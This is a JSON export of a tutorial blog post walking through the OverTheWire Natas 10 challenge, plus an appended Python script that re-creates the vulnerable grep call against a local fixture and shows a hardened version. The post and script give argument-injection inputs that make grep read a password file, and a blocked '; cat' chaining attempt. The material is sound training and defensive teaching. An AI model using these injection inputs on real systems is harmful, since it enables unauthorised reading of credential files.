{"id":2023,"date":"2016-10-26T15:22:05","date_gmt":"2016-10-26T15:22:05","guid":{"rendered":"https:\/\/www.hackmethod.com\/?p=2023"},"modified":"2018-12-12T19:14:28","modified_gmt":"2018-12-12T19:14:28","slug":"overthewire-natas-10","status":"publish","type":"post","link":"https:\/\/hackmethod.com\/overthewire-natas-10\/","title":{"rendered":"OvertheWire &#8211; Natas 10"},"content":{"rendered":"<div class=\"entry-content\">\n<p class=\"entry-content\"><strong>Recap of Last Lesson:<\/strong> We learned more about command injection and how to exploit it. We also revisited directory traversal attacks.<\/p>\n<p class=\"entry-content\"><a href=\"http:\/\/natas10.natas.labs.overthewire.org\/\"><strong>Natas Level 10<\/strong><\/a><\/p>\n<h4 class=\"entry-content\"><strong>Objective:<\/strong><\/h4>\n<p class=\"entry-content\">Find the password to log into level 11.<\/p>\n<h4 class=\"entry-content\"><strong>Intel Given:<\/strong><\/h4>\n<div class=\"entry-content\">\n<ul>\n<li>URL: http:\/\/natas10.natas.labs.overthewire.org\/<\/li>\n<li>Source code available<\/li>\n<\/ul>\n<\/div>\n<p><!--more--><\/p>\n<h4><strong>How to:<\/strong><\/h4>\n<p>Once more, we have access to the source code of the application. Let&#8217;s take a <a href=\"https:\/\/www.hackmethod.com\/wp-content\/uploads\/2016\/10\/Screen-Shot-2016-10-26-at-7.49.33-AM.png\">quick look<\/a>. The source code looks almost identical to the previous level&#8217;s, so I&#8217;ve diffed the two files to see exactly what changed. I used https:\/\/www.diffchecker.com but there are many tools that you can use to do it. Here is a <a href=\"https:\/\/www.hackmethod.com\/wp-content\/uploads\/2016\/10\/Screen-Shot-2016-10-26-at-7.52.55-AM.png\">screenshot<\/a> of my output. 
Let&#8217;s examine the code that changed.<br \/>\n<code><br \/>\nif(preg_match('\/[;|&amp;]\/',$key)) {<br \/>\nprint \"Input contains an illegal character!\";<br \/>\n} else {<br \/>\npassthru(\"grep -i $key dictionary.txt\");<br \/>\n}<br \/>\n<\/code><\/p>\n<\/div>\n<p>The only change is a filter that rejects any key containing <code>;<\/code>, <code>|<\/code> or <code>&amp;<\/code>, heeding our advice on input filtering. Note what it does not do: <code>$key<\/code> is still interpolated unquoted into the command string, so whitespace inside it still splits into separate arguments.<\/p>\n<p>With those characters blocked we can no longer chain a second command onto the passthru call, but we can still abuse the arguments of the one command that does run. Let&#8217;s break down the grep command.<\/p>\n<p><code><br \/>\ngrep -i $key dictionary.txt<br \/>\n<\/code><br \/>\ngrep &#8211; runs the grep binary<br \/>\n-i &#8211; perform case-insensitive matching<br \/>\n$key &#8211; our user-controllable parameter, used as the search pattern<br \/>\ndictionary.txt &#8211; the file to search<\/p>\n<p>Let&#8217;s see if we can exploit the structure of this invocation. First comes the command, then an option, then the search pattern, and lastly the file to read from. What if we could change the file that is read from? Perhaps we could have it search the password file.<\/p>\n<p>How does grep decide which file to search? The file name comes after the search pattern. A quick look at the man page for grep shows something interesting.<\/p>\n<pre><code>The grep utility searches any given input files\n<\/code><\/pre>\n<p>Note the plural: grep accepts several files in one invocation, searches all of them, and prefixes each matching line with the name of the file it came from. Because spaces are not filtered and <code>$key<\/code> is unquoted, a key of the form <code>pattern \/path\/to\/file<\/code> makes the shell hand that path to grep as an additional file argument, in front of dictionary.txt. That lets us search both the password file and dictionary.txt.<\/p>\n<p>Try this query:<br \/>\na \/etc\/natas_webpass\/natas11<\/p>\n<p>The server will run:<\/p>\n<p><code>grep -i a \/etc\/natas_webpass\/natas11 dictionary.txt<\/code><\/p>\n<p>searching both &#8220;\/etc\/natas_webpass\/natas11&#8221; and &#8220;dictionary.txt&#8221; for the letter a.<\/p>\n<p>You will notice that this does not return the password. Why not? 
Because grep prints only the lines that match the pattern: for the password to be returned, the letter &#8220;a&#8221; (or &#8220;A&#8221;, since -i is set) must appear somewhere in it. Let&#8217;s try a couple of other letters and see if we can find a match.<\/p>\n<p>Try this query:<br \/>\nu \/etc\/natas_webpass\/natas11<\/p>\n<p><a href=\"https:\/\/www.hackmethod.com\/wp-content\/uploads\/2016\/10\/Screen-Shot-2016-10-26-at-8.17.13-AM.png\">Success!<\/a><\/p>\n<p>Guessing a letter works as soon as that letter happens to be in the password, but guessing is not necessary: the key is a regular expression, so a pattern that matches any non-empty line, such as a single <code>.<\/code>, returns every line of both files on the first try.<\/p>\n<div class=\"entry-content\">\n<h4 class=\"entry-content\"><strong>Conclusion:<\/strong><\/h4>\n<div class=\"entry-content\"><p>In this lesson we learned that filtering a few shell metacharacters stops command chaining but not argument injection. Last time we learned how to append additional commands; this time we analysed the logic of the one command the application does run and used its arguments in a way the developer did not intend. The fix is not a longer blacklist: pass the key to grep as a single quoted argument (in PHP, escapeshellarg()) or avoid the shell altogether, so that user input can never become an extra argument.<\/p>\n<\/div>\n<\/div>\n<p><!--more--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Recap of Last Lesson: We learned more about command injection and how to exploit it. We also revisited directory traversal attacks. Natas Level 10 Objective: Find the password to log into level 11. 
Intel Given: URL: http:\/\/natas10.natas.labs.overthewire.org\/ Source code available<\/p>\n","protected":false},"author":9,"featured_media":2156,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_et_pb_use_builder":"","_et_pb_old_content":"","_et_gb_content_width":"","jetpack_post_was_ever_published":false,"_jetpack_newsletter_access":"","_jetpack_dont_email_post_to_subs":true,"_jetpack_newsletter_tier_id":0,"_jetpack_memberships_contains_paywalled_content":false,"_jetpack_memberships_contains_paid_content":false,"footnotes":""},"categories":[44,49],"tags":[57,45,46],"class_list":["post-2023","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-overthewire","category-tutorials","tag-natas","tag-overthewire","tag-tutorials"],"jetpack_featured_media_url":"https:\/\/i0.wp.com\/hackmethod.com\/wp-content\/uploads\/2017\/02\/WP_SiteLogo_512x512.png?fit=512%2C506&ssl=1","jetpack_sharing_enabled":true,"jetpack_shortlink":"https:\/\/wp.me\/p5zY4D-wD","_links":{"self":[{"href":"https:\/\/hackmethod.com\/wp-json\/wp\/v2\/posts\/2023","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hackmethod.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/hackmethod.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/hackmethod.com\/wp-json\/wp\/v2\/users\/9"}],"replies":[{"embeddable":true,"href":"https:\/\/hackmethod.com\/wp-json\/wp\/v2\/comments?post=2023"}],"version-history":[{"count":5,"href":"https:\/\/hackmethod.com\/wp-json\/wp\/v2\/posts\/2023\/revisions"}],"predecessor-version":[{"id":5236,"href":"https:\/\/hackmethod.com\/wp-json\/wp\/v2\/posts\/2023\/revisions\/5236"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/hackmethod.com\/wp-json\/wp\/v2\/media\/2156"}],"wp:attachment":[{"href":"https:\/\/hackmethod.com\/wp-json\/wp\/v2\/media?parent=2023"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"ht
tps:\/\/hackmethod.com\/wp-json\/wp\/v2\/categories?post=2023"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/hackmethod.com\/wp-json\/wp\/v2\/tags?post=2023"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
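The argument injection walked through in the post's "How to" section, as an added example that is not part of the original page or of the Natas challenge code. It re-creates the filtered passthru() call in Python, running the same grep command string through /bin/sh against a constructed dictionary.txt and a constructed secret file in a scratch directory (the file contents, the single-dot pattern and the hardened_lookup variant are this example's assumptions, not the page's). It shows that the [;|&] filter blocks command chaining, that a space in the key still smuggles a second file argument to grep, that a pattern matching any non-empty line removes the letter guessing, and that running grep without a shell and with the key as one argument closes the hole.

```python
"""Re-creation of Natas 10's filtered grep call (added example, not the
challenge's code). Files and their contents below are constructed."""
import os
import re
import subprocess
import tempfile

# Constructed fixture standing in for dictionary.txt and
# /etc/natas_webpass/natas11; the contents are made up for this example.
DICTIONARY_WORDS = ["apple", "umbrella", "zebra"]
SECRET = "U3v6xQn9PWKD"  # deliberately contains no 'a', so a search for 'a' misses it


def make_fixture():
    """Create a scratch directory holding dictionary.txt and a secret file.

    Returns (workdir, secret_path). The lookup functions run grep with
    workdir as the current directory, as the web server would.
    """
    workdir = tempfile.mkdtemp()
    with open(os.path.join(workdir, "dictionary.txt"), "w") as f:
        f.write("\n".join(DICTIONARY_WORDS) + "\n")
    secret_path = os.path.join(workdir, "natas11")
    with open(secret_path, "w") as f:
        f.write(SECRET + "\n")
    return workdir, secret_path


def natas10_filter_ok(key):
    """Python equivalent of the page's preg_match('/[;|&]/', $key) check."""
    return re.search(r"[;|&]", key) is None


def vulnerable_lookup(key, workdir):
    """Mimics passthru("grep -i $key dictionary.txt").

    The key is pasted unquoted into a command string that /bin/sh then
    splits on whitespace, so anything after the first space in the key
    becomes an additional argument to grep (here: an extra file to search).
    Returns grep's stdout, or the page's error string if the filter fires.
    """
    if not natas10_filter_ok(key):
        return "Input contains an illegal character!"
    proc = subprocess.run(
        "grep -i " + key + " dictionary.txt",
        shell=True, cwd=workdir, capture_output=True, text=True,
    )
    return proc.stdout


def hardened_lookup(key, workdir):
    """Same search without a shell: an argv list keeps the key one argument.

    '-F' treats the key as a literal string instead of a regex and '--'
    stops grep from reading a key such as '-r' as an option.
    """
    proc = subprocess.run(
        ["grep", "-i", "-F", "--", key, "dictionary.txt"],
        cwd=workdir, capture_output=True, text=True,
    )
    return proc.stdout


if __name__ == "__main__":
    workdir, secret_path = make_fixture()
    for key in ["; cat " + secret_path,   # blocked by the filter
                "a " + secret_path,       # extra file searched, but no 'a' in the secret
                "u " + secret_path,       # the page's working guess
                ". " + secret_path]:      # '.' matches every non-empty line
        print(repr(key), "->", repr(vulnerable_lookup(key, workdir)))
    print("hardened:", repr(hardened_lookup("u " + secret_path, workdir)))
```

Run it directly to see each query's output. hardened_lookup passes grep an argv list so the shell never re-splits the key; the equivalent fix for the page's passthru() string is escapeshellarg() on $key, which turns the whole key into one quoted argument.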